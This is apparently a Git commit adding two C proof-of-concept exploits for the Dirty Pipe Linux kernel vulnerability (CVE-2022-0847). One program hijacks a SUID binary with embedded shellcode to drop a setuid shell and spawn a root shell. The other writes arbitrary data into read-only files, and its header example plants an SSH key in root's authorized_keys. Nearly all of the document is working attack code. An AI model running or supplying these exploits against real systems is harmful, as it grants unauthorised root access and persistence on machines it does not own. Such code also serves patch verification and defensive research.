commit
68338516d8
@ -0,0 +1 @@ |
||||
PoCs for CVE-2022-0847 [DirtyPipe](https://dirtypipe.cm4all.com/) vulnerability. |
@ -0,0 +1,218 @@ |
||||
//
|
||||
// dirtypipez.c
|
||||
//
|
||||
// hacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn
|
||||
// a root shell. (and attempts to restore the damaged binary as well)
|
||||
//
|
||||
// Wow, Dirty CoW reloaded!
|
||||
//
|
||||
// -- blasty <peter@haxx.in> // 2022-03-07
|
||||
|
||||
/* SPDX-License-Identifier: GPL-2.0 */ |
||||
/*
|
||||
* Copyright 2022 CM4all GmbH / IONOS SE |
||||
* |
||||
* author: Max Kellermann <max.kellermann@ionos.com> |
||||
* |
||||
* Proof-of-concept exploit for the Dirty Pipe |
||||
* vulnerability (CVE-2022-0847) caused by an uninitialized |
||||
* "pipe_buffer.flags" variable. It demonstrates how to overwrite any |
||||
* file contents in the page cache, even if the file is not permitted |
||||
* to be written, immutable or on a read-only mount. |
||||
* |
||||
* This exploit requires Linux 5.8 or later; the code path was made |
||||
* reachable by commit f6dd975583bd ("pipe: merge |
||||
* anon_pipe_buf*_ops"). The commit did not introduce the bug, it was |
||||
* there before, it just provided an easy way to exploit it. |
||||
* |
||||
* There are two major limitations of this exploit: the offset cannot |
||||
* be on a page boundary (it needs to write one byte before the offset |
||||
* to add a reference to this page to the pipe), and the write cannot |
||||
* cross a page boundary. |
||||
* |
||||
* Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' |
||||
* |
||||
* Further explanation: https://dirtypipe.cm4all.com/
|
||||
*/ |
||||
|
||||
#define _GNU_SOURCE |
||||
#include <unistd.h> |
||||
#include <fcntl.h> |
||||
#include <stdio.h> |
||||
#include <stdlib.h> |
||||
#include <string.h> |
||||
#include <sys/stat.h> |
||||
#include <sys/user.h> |
||||
#include <stdint.h> |
||||
|
||||
#ifndef PAGE_SIZE |
||||
#define PAGE_SIZE 4096 |
||||
#endif |
||||
|
||||
// small (linux x86_64) ELF file matroshka doll that does;
|
||||
// fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
|
||||
// write(fd, elfcode, elfcode_len)
|
||||
// chmod("/tmp/sh", 04755)
|
||||
// close(fd);
|
||||
// exit(0);
|
||||
//
|
||||
// the dropped ELF simply does:
|
||||
// setuid(0);
|
||||
// setgid(0);
|
||||
// execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
|
||||
unsigned char elfcode[] = { |
||||
/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, |
||||
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, |
||||
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, |
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, |
||||
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, |
||||
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, |
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, |
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, |
||||
0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, |
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, |
||||
0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, |
||||
0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, |
||||
0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, |
||||
0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, |
||||
0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, |
||||
0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, |
||||
0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, |
||||
0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, |
||||
0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, |
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, |
||||
0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, |
||||
0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, |
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, |
||||
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, |
||||
0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, |
||||
0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, |
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, |
||||
0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, |
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, |
||||
0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, |
||||
0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, |
||||
0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, |
||||
0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, |
||||
0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 |
||||
}; |
||||
|
||||
/**
|
||||
* Create a pipe where all "bufs" on the pipe_inode_info ring have the |
||||
* PIPE_BUF_FLAG_CAN_MERGE flag set. |
||||
*/ |
||||
static void prepare_pipe(int p[2]) |
||||
{ |
||||
if (pipe(p)) abort(); |
||||
|
||||
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); |
||||
static char buffer[4096]; |
||||
|
||||
/* fill the pipe completely; each pipe_buffer will now have
|
||||
the PIPE_BUF_FLAG_CAN_MERGE flag */ |
||||
for (unsigned r = pipe_size; r > 0;) { |
||||
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; |
||||
write(p[1], buffer, n); |
||||
r -= n; |
||||
} |
||||
|
||||
/* drain the pipe, freeing all pipe_buffer instances (but
|
||||
leaving the flags initialized) */ |
||||
for (unsigned r = pipe_size; r > 0;) { |
||||
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; |
||||
read(p[0], buffer, n); |
||||
r -= n; |
||||
} |
||||
|
||||
/* the pipe is now empty, and if somebody adds a new
|
||||
pipe_buffer without initializing its "flags", the buffer |
||||
will be mergeable */ |
||||
} |
||||
|
||||
int hax(char *filename, long offset, uint8_t *data, size_t len) { |
||||
/* open the input file and validate the specified offset */ |
||||
const int fd = open(filename, O_RDONLY); // yes, read-only! :-)
|
||||
if (fd < 0) { |
||||
perror("open failed"); |
||||
return -1; |
||||
} |
||||
|
||||
struct stat st; |
||||
if (fstat(fd, &st)) { |
||||
perror("stat failed"); |
||||
return -1; |
||||
} |
||||
|
||||
/* create the pipe with all flags initialized with
|
||||
PIPE_BUF_FLAG_CAN_MERGE */ |
||||
int p[2]; |
||||
prepare_pipe(p); |
||||
|
||||
/* splice one byte from before the specified offset into the
|
||||
pipe; this will add a reference to the page cache, but |
||||
since copy_page_to_iter_pipe() does not initialize the |
||||
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ |
||||
--offset; |
||||
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); |
||||
if (nbytes < 0) { |
||||
perror("splice failed"); |
||||
return -1; |
||||
} |
||||
if (nbytes == 0) { |
||||
fprintf(stderr, "short splice\n"); |
||||
return -1; |
||||
} |
||||
|
||||
/* the following write will not create a new pipe_buffer, but
|
||||
will instead write into the page cache, because of the |
||||
PIPE_BUF_FLAG_CAN_MERGE flag */ |
||||
nbytes = write(p[1], data, len); |
||||
if (nbytes < 0) { |
||||
perror("write failed"); |
||||
return -1; |
||||
} |
||||
if ((size_t)nbytes < len) { |
||||
fprintf(stderr, "short write\n"); |
||||
return -1; |
||||
} |
||||
|
||||
close(fd); |
||||
|
||||
return 0; |
||||
} |
||||
|
||||
int main(int argc, char **argv) { |
||||
if (argc != 2) { |
||||
fprintf(stderr, "Usage: %s SUID\n", argv[0]); |
||||
return EXIT_FAILURE; |
||||
} |
||||
|
||||
char *path = argv[1]; |
||||
uint8_t *data = elfcode; |
||||
|
||||
int fd = open(path, O_RDONLY); |
||||
uint8_t *orig_bytes = malloc(sizeof(elfcode)); |
||||
lseek(fd, 1, SEEK_SET); |
||||
read(fd, orig_bytes, sizeof(elfcode)); |
||||
close(fd); |
||||
|
||||
printf("[+] hijacking suid binary..\n"); |
||||
if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) { |
||||
printf("[~] failed\n"); |
||||
return EXIT_FAILURE; |
||||
} |
||||
|
||||
printf("[+] dropping suid shell..\n"); |
||||
system(path); |
||||
|
||||
printf("[+] restoring suid binary..\n"); |
||||
if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) { |
||||
printf("[~] failed\n"); |
||||
return EXIT_FAILURE; |
||||
} |
||||
|
||||
printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n"); |
||||
system("/tmp/sh"); |
||||
|
||||
return EXIT_SUCCESS; |
||||
} |
@ -0,0 +1,156 @@ |
||||
/* SPDX-License-Identifier: GPL-2.0 */ |
||||
/*
|
||||
* Copyright 2022 CM4all GmbH / IONOS SE |
||||
* |
||||
* author: Max Kellermann <max.kellermann@ionos.com> |
||||
* |
||||
* Proof-of-concept exploit for the Dirty Pipe |
||||
* vulnerability (CVE-2022-0847) caused by an uninitialized |
||||
* "pipe_buffer.flags" variable. It demonstrates how to overwrite any |
||||
* file contents in the page cache, even if the file is not permitted |
||||
* to be written, immutable or on a read-only mount. |
||||
* |
||||
* This exploit requires Linux 5.8 or later; the code path was made |
||||
* reachable by commit f6dd975583bd ("pipe: merge |
||||
* anon_pipe_buf*_ops"). The commit did not introduce the bug, it was |
||||
* there before, it just provided an easy way to exploit it. |
||||
* |
||||
* There are two major limitations of this exploit: the offset cannot |
||||
* be on a page boundary (it needs to write one byte before the offset |
||||
* to add a reference to this page to the pipe), and the write cannot |
||||
* cross a page boundary. |
||||
* |
||||
* Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' |
||||
* |
||||
* Further explanation: https://dirtypipe.cm4all.com/
|
||||
*/ |
||||
|
||||
#define _GNU_SOURCE |
||||
#include <unistd.h> |
||||
#include <fcntl.h> |
||||
#include <stdio.h> |
||||
#include <stdlib.h> |
||||
#include <string.h> |
||||
#include <sys/stat.h> |
||||
#include <sys/user.h> |
||||
|
||||
#ifndef PAGE_SIZE |
||||
#define PAGE_SIZE 4096 |
||||
#endif |
||||
|
||||
/**
|
||||
* Create a pipe where all "bufs" on the pipe_inode_info ring have the |
||||
* PIPE_BUF_FLAG_CAN_MERGE flag set. |
||||
*/ |
||||
static void prepare_pipe(int p[2]) |
||||
{ |
||||
if (pipe(p)) abort(); |
||||
|
||||
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); |
||||
static char buffer[4096]; |
||||
|
||||
/* fill the pipe completely; each pipe_buffer will now have
|
||||
the PIPE_BUF_FLAG_CAN_MERGE flag */ |
||||
for (unsigned r = pipe_size; r > 0;) { |
||||
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; |
||||
write(p[1], buffer, n); |
||||
r -= n; |
||||
} |
||||
|
||||
/* drain the pipe, freeing all pipe_buffer instances (but
|
||||
leaving the flags initialized) */ |
||||
for (unsigned r = pipe_size; r > 0;) { |
||||
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; |
||||
read(p[0], buffer, n); |
||||
r -= n; |
||||
} |
||||
|
||||
/* the pipe is now empty, and if somebody adds a new
|
||||
pipe_buffer without initializing its "flags", the buffer |
||||
will be mergeable */ |
||||
} |
||||
|
||||
int main(int argc, char **argv) |
||||
{ |
||||
if (argc != 4) { |
||||
fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]); |
||||
return EXIT_FAILURE; |
||||
} |
||||
|
||||
/* dumb command-line argument parser */ |
||||
const char *const path = argv[1]; |
||||
loff_t offset = strtoul(argv[2], NULL, 0); |
||||
const char *const data = argv[3]; |
||||
const size_t data_size = strlen(data); |
||||
|
||||
if (offset % PAGE_SIZE == 0) { |
||||
fprintf(stderr, "Sorry, cannot start writing at a page boundary\n"); |
||||
return EXIT_FAILURE; |
||||
} |
||||
|
||||
const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1; |
||||
const loff_t end_offset = offset + (loff_t)data_size; |
||||
if (end_offset > next_page) { |
||||
fprintf(stderr, "Sorry, cannot write across a page boundary\n"); |
||||
return EXIT_FAILURE; |
||||
} |
||||
|
||||
/* open the input file and validate the specified offset */ |
||||
const int fd = open(path, O_RDONLY); // yes, read-only! :-)
|
||||
if (fd < 0) { |
||||
perror("open failed"); |
||||
return EXIT_FAILURE; |
||||
} |
||||
|
||||
struct stat st; |
||||
if (fstat(fd, &st)) { |
||||
perror("stat failed"); |
||||
return EXIT_FAILURE; |
||||
} |
||||
|
||||
if (offset > st.st_size) { |
||||
fprintf(stderr, "Offset is not inside the file\n"); |
||||
return EXIT_FAILURE; |
||||
} |
||||
|
||||
if (end_offset > st.st_size) { |
||||
fprintf(stderr, "Sorry, cannot enlarge the file\n"); |
||||
return EXIT_FAILURE; |
||||
} |
||||
|
||||
/* create the pipe with all flags initialized with
|
||||
PIPE_BUF_FLAG_CAN_MERGE */ |
||||
int p[2]; |
||||
prepare_pipe(p); |
||||
|
||||
/* splice one byte from before the specified offset into the
|
||||
pipe; this will add a reference to the page cache, but |
||||
since copy_page_to_iter_pipe() does not initialize the |
||||
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ |
||||
--offset; |
||||
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); |
||||
if (nbytes < 0) { |
||||
perror("splice failed"); |
||||
return EXIT_FAILURE; |
||||
} |
||||
if (nbytes == 0) { |
||||
fprintf(stderr, "short splice\n"); |
||||
return EXIT_FAILURE; |
||||
} |
||||
|
||||
/* the following write will not create a new pipe_buffer, but
|
||||
will instead write into the page cache, because of the |
||||
PIPE_BUF_FLAG_CAN_MERGE flag */ |
||||
nbytes = write(p[1], data, data_size); |
||||
if (nbytes < 0) { |
||||
perror("write failed"); |
||||
return EXIT_FAILURE; |
||||
} |
||||
if ((size_t)nbytes < data_size) { |
||||
fprintf(stderr, "short write\n"); |
||||
return EXIT_FAILURE; |
||||
} |
||||
|
||||
printf("It worked!\n"); |
||||
return EXIT_SUCCESS; |
||||
} |
Loading…
Reference in new issue